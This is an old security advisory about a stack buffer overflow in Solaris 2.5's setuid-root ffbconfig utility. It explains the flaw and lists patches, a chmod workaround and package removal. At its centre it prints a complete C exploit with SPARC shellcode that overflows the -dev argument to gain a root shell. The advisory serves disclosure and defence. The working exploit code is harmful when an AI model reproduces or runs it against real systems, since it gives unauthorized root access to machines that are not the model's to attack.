COMMAND

    /usr/sbin/ffbconfig

SYSTEMS AFFECTED

    Solaris  2.5  with  the  Fast  Buffer  Graphics  Accelerator  card
    installed.

PROBLEM

    (FFB) Graphics Accelerator, and  is part of the  FFB Configuration
    Software package, SUNWffbcf.  This software is only of use if  the
    FFB  Graphics  accelerator  card  is  installed.   If  the  device
    /dev/fbs/ffb0 exists, it may indicate that the card is installed.

    Due  to  insufficient  bounds  checking  on  arguments  which  are
    supplied by users, it is possible to overwrite the internal  stack
    space  of  the  ffbconfig  program  while  it  is  executing.   By
    supplying a carefully designed argument to the ffbconfig  program,
    intruders  may  be  able  to  force ffbconfig to execute arbitrary
    commands.  As ffbconfig is  setuid root, this may allow  intruders
    to run arbitrary commands with root privileges.

    Cristian SCHIPOR  <skipo@SUNDY.CS.PUB.RO> have  found a  buffer
    overflow hole in ffbconfig (Solaris2.X).  That allow  you to  gain
    root access on your machine. He used an exploit written by  Jeremy
    Elson for gethostbyname() buffer  overflow hole (he modified  some
    values to make this work).  Here comes Cristian's exploit:

/*
This works on Solaris 2.5 wiz /usr/sbin/ffbconfig
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH      128
#define EXTRA           256
#define STACK_OFFSET    128
#define SPARC_NOP       0xa61cc013

u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

u_long get_sp(void)
{
  __asm__("mov %sp,%i0 \n");
}

void main(int argc, char *argv[])
{
  char buf[BUF_LENGTH + EXTRA];
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen(sparc_shellcode),so;

  long_p = (u_long *) buf;

  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  char_p = (u_char *) long_p;

  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  long_p = (u_long *) char_p;

  targ_addr = get_sp() - STACK_OFFSET;
  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ =targ_addr;

  printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);

  execl("/usr/sbin/ffbconfig", "ffbconfig", "-dev", buf,(char *) 0);
  perror("execl failed");
}

SOLUTION

    The vulnerability relating to ffbconfig is fixed by the  following
    patches:

    OS version    Patch ID
    ----------    --------
    SunOS 5.5.1   103796-09
    SunOS 5.5     103076-09

    The above-mentioned  patches are  listed in  the Graphics  section
    under Unbundled Products at:

        ftp://sunsolve1.sun.com/pub/patches/patches.html.

    You can  also as  alternative remove  setuid and  non-root execute
    permissions:

        # chmod 500 /usr/sbin/ffbconfig
        # ls -l /usr/sbin/ffbconfig
        -r-x------   1 root  bin   31436 Oct 14 1995 /usr/sbin/ffbconfig

    or remove the SUNWffbcf package:

        # /usr/sbin/pkgrm SUNWffbcf

    There  are  also  a  number  of  other  packages  which  are  also
    associated with the FFB Graphics Accelerator:

        SUNWffb        FFB System Software (Device Driver)
        SUNWffbmn      On-Line FFB Manual Pages
        SUNWffbw       FFB Window System Support
        SUNWffbxg      FFB XGL support

    Although there is nothing  to suggest that these  packages contain
    vulnerabilities, if  you do  not require  their functionality, you
    may also wish to remove them with the /usr/sbin/pkgrm command.

    Also, there is  report that you  can gain root  priviledge by this
    exploit under AFS  UNIX system, but  even you have  UID=0 it means
    nothing to you because cause  you don't have root priviledges  and
    this is because 'fs' takes over 'chmod'.